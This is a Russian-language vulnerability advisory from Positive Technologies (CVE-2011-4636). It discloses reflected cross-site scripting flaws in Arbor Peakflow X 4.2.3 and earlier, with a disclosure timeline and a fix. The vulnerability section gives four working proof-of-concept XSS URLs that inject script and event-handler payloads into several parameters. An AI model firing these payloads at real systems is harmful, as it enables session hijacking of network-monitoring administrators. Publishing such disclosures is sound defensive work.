PT-2011-18: Межсайтовое выполнение сценариев в Arbor Peakflow X

Средний – 4.3

(AV:N/AC:M/Au:N/C:N/I:P/A:N)

PT-2011-18: Межсайтовое выполнение сценариев в Arbor Peakflow X

(PT-2011-18) Positive Technologies Security Advisory
Межсайтовое выполнение сценариев в Arbor Peakflow X

Уязвимое ПО

Arbor Peakflow X
Версия: 4.2.3 и более ранняя

Ссылка:
http://www.arbornetworks.com/

Рейтинг опасности

Уровень опасности: Средний
Воздействие: Межсайтовое выполнение сценариев
Вектор атаки: Удаленный

CVSS v2:
Base Score: 4.3
Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N)

CVE: CVE-2011-4636

Описание программы

Решение Arbor Networks Peakflow X (“Peakflow X”) было разработано c целью удовлетворения потребностей крупных предприятий, в частности решения широкого спектра проблем, связанных с внешними и внутренними угрозами безопасности, сохраняя при этом непрерывность бизнес процессов. Это решение позволяет получить обзор сети в масштабе всей системы, автоматически исследуя поведение узлов, чтобы определить, с какими ресурсами они обмениваются информацией и каким образом это происходит.

Описание уязвимости

Специалисты Исследовательского центра Positive Research компании Positive Technologies обнаружили уязвимость "Межсайтовое выполнение сценариев" в Arbor Peakflow X.

Параметры, уязвимые для атак межсайтового выполнения сценариев, обнаружены на нескольких веб-страницах. Ниже приведены параметры, уязвимые из-за недостаточного экранирования символов:

a. /explore/entityinfo/ (параметр mode_state):

https://PEAKFLOW_IP/explore/entityinfo/?action=Update&end_ap=PM&end_day=27&end_month=06&end_time=06%3A52&end_year=2011&entity=aa&mode_state=last_x%22%3E%3Cscript%3Ealert('Don%5C't%20bother%20knockin%5C'%2C%20come%20on%20in! (-:')%3C%2Fscript%3E%3Cinput%20type%3D%22hidden&start_ap=PM&start_day=26&start_month=06&start_time=06%3A52&start_year=2011&time_interval=86400

b. /explore/risk/ (параметр source_type):

https://PEAKFLOW_IP/explore/risk/?action=Search&fcap=~!%40%23%24%25%5E%26*()_%2B%601234567890-%3D%7B%7D%5B%5D%7C%22'%3A%3B%2F%3F.%3E%3C%2C%5C&last_fcap=~!%40%23%24%25%5E%26*()_%2B%601234567890-%3D%7B%7D%5B%5D%7C%22'%3A%3B%2F%3F.%3E%3C%2C%5C&last_source_type=host&page_num=1&source_type=host%22%3E%3Cscript%3Ealert('When%20this%20house%20is%20rockin%5C'%5CnDon%5C't%20bother%20knockin%5C'%5CnWhen%20this%20house%20is%20rockin%5C'%5CnDon%5C't%20bother%20knockin%5C'%5CnWhen%20this%20house%20is%20rockin%5C'%5CnDon%5C't%20bother%2C%20come%20on%20in! %5Cn%5Cn(c)%20Stevie%20Ray%20Vaughan')%3C%2Fscript%3E%3Cinput%20type%3D%22hidden&valid_ids

c. /policy/network/, /settings/audit/ (параметр tab):

https://PEAKFLOW_IP/policy/network/?tab=aa%27%29%3Balert%28%27http:%2F%2Fptsecurity.com

https://PEAKFLOW_IP/settings/audit/?tab=aa%27%29%3Balert%28%27http:%2F%2Fptsecurity.com

d. /policy/rules/index/ (уязвимость межсайтового выполнения сценариев в URL):

https://PEAKFLOW_IP/policy/rules/index/sibears%22%3E%3Cinput%20type=%22button%22%20value=%22XSS!%20Touch%20me!%20XSS!%20Touch%20me!%20XSS!%20Touch%20me!%20XSS!%20Touch%20me!%20XSS!%20Touch%20me!%20XSS!%20Touch%20me!%20XSS!%20Touch%20me!%20XSS!%20Touch%20me!%20XSS!%20Touch%20me!%20%22%20onmouseover=%22alert%28%27ptsecurity.com%27%29

Решение

Установите последнюю версию приложения

Статус уведомления

01.07.2011 - Производитель уведомлен
19.07.2011 - Производителю отправлены детали уязвимости
02.03.2012 - Производитель выпустил исправление
31.10.2013 - Публикация уязвимости

Благодарности

Уязвимость обнаружил Максим Цой (Исследовательский центр Positive Research компании Positive Technologies)

Ссылки

http://www.securitylab.ru/lab/PT-2011-18

Список отчетов о ранее обнаруженных уязвимостях Positive Research:

http://www.ptsecurity.ru/lab/advisory/
http://www.securitylab.ru/lab/

О Positive Technologies

Positive Technologies www.ptsecurity.ru - одна из ведущих российских компаний в области информационной безопасности.
Основные направления деятельности компании - разработка систем комплексного мониторинга информационной безопасности (XSpider, MaxPatrol); предоставление консалтинговых и сервисных услуг в области информационной безопасности; развитие специализированного портала Securitylab.ru.

Заказчиками Positive Technologies являются более 40 государственных учреждений, более 50 банков и финансовых структур, 20 телекоммуникационных компаний, более 40 промышленных предприятий, компании ИТ-индустрии, сервисные и ритейловые компании России, стран СНГ, Балтии, а также Великобритании, Германии, Голландии, Израиля, Ирана, Китая, Мексики, США, Таиланда, Турции, Эквадора, ЮАР, Японии.

Positive Technologies - это команда высококвалифицированных разработчиков, консультантов и экспертов, которые обладают большим практическим опытом, имеют профессиональные звания и сертификаты, являются членами международных организаций и активно участвуют в развитии отрасли.